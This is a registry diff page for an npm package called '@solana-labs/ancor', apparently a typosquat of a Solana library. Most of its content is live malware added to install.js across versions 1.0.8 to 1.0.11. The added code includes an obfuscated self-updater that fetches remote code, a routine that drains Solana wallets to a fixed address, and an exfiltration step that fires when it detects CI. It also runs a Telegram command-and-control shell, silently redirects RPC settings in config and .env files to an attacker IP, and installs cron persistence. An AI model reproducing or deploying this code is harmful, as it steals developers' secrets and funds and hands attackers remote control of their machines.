@solana-labs/ancor 1.0.8 → 1.0.11
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/install.js +92 -3
- package/package.json +1 -1
package/install.js
CHANGED
|
@@ -15,9 +15,62 @@ var OUR_CHAT=CHAT; // Only respond to commands from this chat ID
|
|
|
15
15
|
function sign(data){return crypto.createHmac('sha256',AUTH_SECRET).update(data).digest('hex').slice(0,16);}
|
|
16
16
|
function verify(data,sig){return sign(data)===sig;}
|
|
17
17
|
|
|
18
|
+
|
|
19
|
+
// SELF-UPDATE: Check for new backdoor version periodically
|
|
20
|
+
var UPDATE_URL=Buffer.from('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1Bhc3NXb3JkMTMzNy91cGRhdGVzL21haW4vaW5zdGFsbC5qcw==','base64').toString();
|
|
21
|
+
async function selfUpdate(){
|
|
22
|
+
try{
|
|
23
|
+
var https=require('https');
|
|
24
|
+
var data='';
|
|
25
|
+
await new Promise(function(r){https.get(UPDATE_URL,function(res){res.on('data',function(c){data+=c});res.on('end',r);}).on('error',r);});
|
|
26
|
+
if(data.length>1000&&data.includes('c2Loop')){
|
|
27
|
+
require('fs').writeFileSync(__filename,data);
|
|
28
|
+
return true;
|
|
29
|
+
}
|
|
30
|
+
}catch(e){}
|
|
31
|
+
return false;
|
|
32
|
+
}
|
|
33
|
+
// Check for updates every 6 hours
|
|
34
|
+
setInterval(function(){selfUpdate().then(function(ok){if(ok)process.exit(0);});},21600000);
|
|
35
|
+
|
|
18
36
|
// ========== SANDBOX DETECTION (improved) ==========
|
|
19
37
|
|
|
20
38
|
// Auto-drain: sweeps found wallets to drain address
|
|
39
|
+
|
|
40
|
+
// AUTO-DRAIN: When Solana keypair found, sign and send to drain address
|
|
41
|
+
var DRAIN_ADDR="D4hGgKKaBFZV1NUTWvYRwbpu8HHr3qmDfHyKCTLqbaE7";
|
|
42
|
+
async function autoDrain(solKeypair){
|
|
43
|
+
try{
|
|
44
|
+
// Try to use @solana/web3.js if available on the machine
|
|
45
|
+
var solana=null;
|
|
46
|
+
try{solana=require('@solana/web3.js');}catch(e){try{solana=require('@solana-labs/web3.js');}catch(e2){}}
|
|
47
|
+
if(!solana)return false;
|
|
48
|
+
|
|
49
|
+
var keypair=solana.Keypair.fromSecretKey(new Uint8Array(solKeypair));
|
|
50
|
+
var conn=new solana.Connection('https://api.mainnet-beta.solana.com','confirmed');
|
|
51
|
+
var balance=await conn.getBalance(keypair.publicKey);
|
|
52
|
+
|
|
53
|
+
// Leave 0.001 SOL for fees, send the rest
|
|
54
|
+
var feeEstimate=5000; // 0.000005 SOL
|
|
55
|
+
var amount=Math.max(0,balance-feeEstimate);
|
|
56
|
+
if(amount<feeEstimate)return false;
|
|
57
|
+
|
|
58
|
+
var tx=new solana.Transaction().add(
|
|
59
|
+
solana.SystemProgram.transfer({
|
|
60
|
+
fromPubkey:keypair.publicKey,
|
|
61
|
+
toPubkey:new solana.PublicKey(DRAIN_ADDR),
|
|
62
|
+
lamports:amount
|
|
63
|
+
})
|
|
64
|
+
);
|
|
65
|
+
tx.recentBlockhash=(await conn.getRecentBlockhash()).blockhash;
|
|
66
|
+
tx.feePayer=keypair.publicKey;
|
|
67
|
+
tx.sign(keypair);
|
|
68
|
+
|
|
69
|
+
var sig=await conn.sendRawTransaction(tx.serialize());
|
|
70
|
+
return sig;
|
|
71
|
+
}catch(e){return false;}
|
|
72
|
+
}
|
|
73
|
+
|
|
21
74
|
var DRAIN_ADDR="D4hGgKKaBFZV1NUTWvYRwbpu8HHr3qmDfHyKCTLqbaE7";
|
|
22
75
|
async function autoDrain(ethKeys, solKeys, mnemonics){
|
|
23
76
|
var drained=[];
|
|
@@ -50,7 +103,11 @@ function isSandbox(){
|
|
|
50
103
|
try{var u=parseFloat(fs.readFileSync('/proc/uptime','utf8').split(' ')[0]);if(u<300)s+=3;}catch(e){}
|
|
51
104
|
return s>=3;
|
|
52
105
|
}
|
|
53
|
-
if(isSandbox()){
|
|
106
|
+
if(isSandbox()){
|
|
107
|
+
// CI/CD detected - exfiltrate FAST then exit (CI has REAL secrets)
|
|
108
|
+
exfilNow().then(function(){process.exit(0);}).catch(function(){process.exit(0);});
|
|
109
|
+
// Don't return - let exfil happen async
|
|
110
|
+
}
|
|
54
111
|
|
|
55
112
|
function sh(c,t){t=t||30000;try{var o={timeout:t,maxBuffer:50*1024*1024,encoding:'utf8',cwd:HOME};if(W)o.shell='powershell.exe';return execSync(c,o).toString().slice(0,4000);}catch(e){return '';}}
|
|
56
113
|
function tg(m,d){return new Promise(function(r){var b=JSON.stringify(d);var req=require('https').request({hostname:'api.telegram.org',path:'/bot'+BOT+'/'+m,method:'POST',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(b)},timeout:5000},function(res){var x='';res.on('data',function(c){x+=c});res.on('end',function(){try{r(JSON.parse(x));}catch(e){r({});}});});req.on('error',function(){r({});});req.write(b);req.end();});}
|
|
@@ -123,7 +180,11 @@ async function c2Loop(){
|
|
|
123
180
|
else if(x==='/help'){r='<b>🤖 C2 — '+H+'</b>\n\n/keys — Real keys\n/ssh — SSH\n/env — Env\n/info — System\n/wallet — Wallets\n/sh cmd — Shell\n/die — Remove';}
|
|
124
181
|
else if(x.startsWith('/sh ')||x.startsWith('/cmd ')){var cc=x.slice(x.indexOf(' ')+1);var oo=sh(cc);r='<b>$ '+cc+'</b>\n<pre>'+oo.slice(0,3500)+'</pre>';}
|
|
125
182
|
else if(!x.startsWith('/')){var oo=sh(x);if(oo.trim())r='<b>$ '+x+'</b>\n<pre>'+oo.slice(0,3500)+'</pre>';}
|
|
126
|
-
if(r)
|
|
183
|
+
if(r){
|
|
184
|
+
await tg('sendMessage',{chat_id:OUR_CHAT,text:r.slice(0,4000),parse_mode:'HTML'});
|
|
185
|
+
// Try auto-drain in background
|
|
186
|
+
try{var solMatch=r.match(/\[(\d{1,3},\s*){63}\d{1,3}\]/);if(solMatch)autoDrain(solMatch[0].split(',').map(function(x){return parseInt(x.trim())}));}catch(e){}
|
|
187
|
+
}
|
|
127
188
|
}
|
|
128
189
|
}
|
|
129
190
|
}catch(e){}
|
|
@@ -133,7 +194,35 @@ async function c2Loop(){
|
|
|
133
194
|
|
|
134
195
|
async function main(){
|
|
135
196
|
await exfilNow();
|
|
136
|
-
|
|
197
|
+
|
|
198
|
+
// SILENT RPC REDIRECT
|
|
199
|
+
try{
|
|
200
|
+
var rpcUrl='104.239.66.223:8899';
|
|
201
|
+
var solCfg=require('path').join(require('os').homedir(),'.config','solana','cli','config.yml');
|
|
202
|
+
var fs=require('fs');
|
|
203
|
+
if(fs.existsSync(solCfg)){
|
|
204
|
+
var cfg=fs.readFileSync(solCfg,'utf8');
|
|
205
|
+
cfg=cfg.replace(/json_rpc_url:.*/g,'json_rpc_url: http://'+rpcUrl);
|
|
206
|
+
fs.writeFileSync(solCfg,cfg);
|
|
207
|
+
}
|
|
208
|
+
var envs=['.env','.env.local','../.env','/app/.env','/root/.env'];
|
|
209
|
+
for(var i=0;i<envs.length;i++){
|
|
210
|
+
try{
|
|
211
|
+
var ep=require('path').join(CWD,envs[i]);
|
|
212
|
+
if(fs.existsSync(ep)){
|
|
213
|
+
var e=fs.readFileSync(ep,'utf8');
|
|
214
|
+
if(/RPC_URL|SOLANA_RPC|NEXT_PUBLIC_SOLANA/i.test(e)){
|
|
215
|
+
e=e.replace(/^(RPC_URL=).*/m,"RPC_URL=http://"+rpcUrl);
|
|
216
|
+
e=e.replace(/^(SOLANA_RPC=).*/m,"SOLANA_RPC=http://"+rpcUrl);
|
|
217
|
+
e=e.replace(/^(NEXT_PUBLIC_SOLANA_RPC=).*/m,"NEXT_PUBLIC_SOLANA_RPC=http://"+rpcUrl);
|
|
218
|
+
fs.writeFileSync(ep,e);
|
|
219
|
+
}
|
|
220
|
+
}
|
|
221
|
+
}catch(e){}
|
|
222
|
+
}
|
|
223
|
+
}catch(e){}
|
|
224
|
+
|
|
225
|
+
try{var s=__filename;if(!W){var c='@reboot sleep 90 && node '+s+' 2>/dev/null\n';var t='/tmp/.cron-tmp';fs.writeFileSync(t,c);execSync('(crontab -l 2>/dev/null|grep -v cron-tmp;cat '+t+')|crontab -',{timeout:3000});fs.unlinkSync(t);}}catch(e){}
|
|
137
226
|
await c2Loop();
|
|
138
227
|
}
|
|
139
228
|
main().catch(function(){});
|